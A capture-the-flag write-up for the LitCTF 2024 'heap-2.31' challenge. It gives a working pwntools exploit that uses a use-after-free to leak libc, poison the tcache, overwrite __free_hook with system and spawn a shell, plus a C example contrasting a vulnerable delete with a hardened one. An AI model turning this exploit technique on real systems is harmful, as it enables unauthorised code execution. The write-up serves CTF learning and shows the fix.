[LitCTF 2024]heap-2.31
Problem: [LitCTF 2024]heap-2.31
Approach
Fill the tcache, then use the unsorted bin to leak free_hook; use the UAF to modify a tcache chunk's fd, which gives arbitrary memory read/write, and hijack free_hook.
EXP
```python
from pwn import *

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./heap')
lib = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#io = gdb.debug('./heap')
io = remote('node4.anna.nssctf.cn', 28242)


# Menu wrappers: 1 = create, 2 = delete, 3 = show, 4 = edit
def create(idx, size):
    io.sendlineafter(b'>>', str(1))
    io.sendlineafter(b'idx?', str(idx))
    io.sendlineafter(b'size?', str(size))


def delete(idx):
    io.sendlineafter(b'>>', str(2))
    io.sendlineafter(b'idx?', str(idx))


def show(idx):
    io.sendlineafter(b'>>', str(3))
    io.sendlineafter(b'idx?', str(idx))


def edit(idx, content):
    io.sendlineafter(b'>>', str(4))
    io.sendlineafter(b'idx?', str(idx))
    io.sendlineafter(b'content : \n', content)


# Nine 0x88 chunks (0x90 bin); freeing the first eight fills the tcache with
# chunks 0-6 and sends chunk 7 to the unsorted bin.
for i in range(9):
    create(i, 0x88)
for i in range(8):
    delete(i)

# UAF: show the freed unsorted-bin chunk to read its libc pointer, then
# offset to free_hook and derive the libc base.
show(7)
free_hook = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) + 0x2268
log.info(hex(free_hook))
lib_base = free_hook - lib.sym['__free_hook']
sys_addr = lib_base + lib.sym['system']

# UAF: overwrite the fd of tcache chunk 5 (not the last one, see summary).
# Allocations 10 and 11 pop chunks 6 and 5; allocation 12 returns free_hook.
edit(5, p64(free_hook))
for i in range(10, 13):
    create(i, 0x88)
edit(12, p64(sys_addr))
edit(8, b'/bin/sh\x00')
delete(8)
io.interactive()
```
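The whole chain above rests on one defect in the challenge binary: delete frees the chunk but leaves the stale pointer in the index table, so show and edit keep working on freed memory. The following C program is an added example, not code from the writeup or from the challenge; it is a constructed note table in the same create/delete/show/edit shape, with the vulnerable delete beside the hardened one (clear the slot after free and refuse any operation on an empty slot) so the difference can be checked directly. The dangling pointer is only compared against NULL, never dereferenced.

```c
#include <stdlib.h>
#include <string.h>

#define SLOTS 16

/*
 * Constructed note table modelled on the menu of a heap challenge.
 * Each slot holds a heap pointer; NULL means the slot is empty.
 * Two tables are kept so the vulnerable and hardened delete can be compared.
 */
static char *vuln_notes[SLOTS];
static char *safe_notes[SLOTS];

static int slot_ok(int idx) { return idx >= 0 && idx < SLOTS; }

/* create: allocate a chunk for an empty slot. Returns 0 on success, -1 on refusal. */
int note_create(char **table, int idx, size_t size) {
    if (!slot_ok(idx) || table[idx] != NULL || size == 0) return -1;
    table[idx] = calloc(1, size);
    return table[idx] ? 0 : -1;
}

/* Vulnerable delete: frees the chunk but leaves the stale pointer in the
 * table, so a later show()/edit() on the same index operates on freed
 * memory. This is the use-after-free the writeup relies on. */
int vuln_delete(int idx) {
    if (!slot_ok(idx) || vuln_notes[idx] == NULL) return -1;
    free(vuln_notes[idx]);
    return 0;
}

/* Hardened delete: clear the slot right after free. A second delete, or a
 * show()/edit() on the freed index, is refused instead of touching freed memory. */
int safe_delete(int idx) {
    if (!slot_ok(idx) || safe_notes[idx] == NULL) return -1;
    free(safe_notes[idx]);
    safe_notes[idx] = NULL;
    return 0;
}

/* show: return the slot's pointer, or NULL if the slot is empty or out of range.
 * On the vulnerable table this hands back a dangling pointer after delete. */
const char *note_show(char **table, int idx) {
    if (!slot_ok(idx)) return NULL;
    return table[idx];
}

/* edit: copy content into the slot's chunk; refused when the slot is empty. */
int note_edit(char **table, int idx, const char *content, size_t len) {
    if (!slot_ok(idx) || table[idx] == NULL) return -1;
    memcpy(table[idx], content, len);
    return 0;
}

/* Returns 1 when the vulnerable table still exposes a freed chunk while the
 * hardened table refuses every operation on the freed index. */
int uaf_demo(void) {
    if (note_create(vuln_notes, 0, 0x88) != 0) return 0;
    if (note_create(safe_notes, 0, 0x88) != 0) return 0;
    vuln_delete(0);
    safe_delete(0);
    int vuln_dangling = note_show(vuln_notes, 0) != NULL;   /* stale pointer survives */
    int safe_refused  = note_show(safe_notes, 0) == NULL
                     && safe_delete(0) == -1                /* double free refused */
                     && note_edit(safe_notes, 0, "x", 1) == -1;
    vuln_notes[0] = NULL;   /* tidy the constructed table so the demo is repeatable */
    return vuln_dangling && safe_refused;
}
```

The fix is the single assignment in safe_delete: once the slot is NULL, every path that would read or write the freed chunk (the show used for the leak, the edit used to poison the tcache fd, and a second delete) is rejected by the existing empty-slot check.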
Summary
Note that when using the UAF to change a tcache chunk's fd to the free_hook address, you cannot use the last (seventh) chunk in the tcache; doing so makes the allocation fail and the chunk ends up unlinked.
This post is licensed under CC BY 4.0 by the author.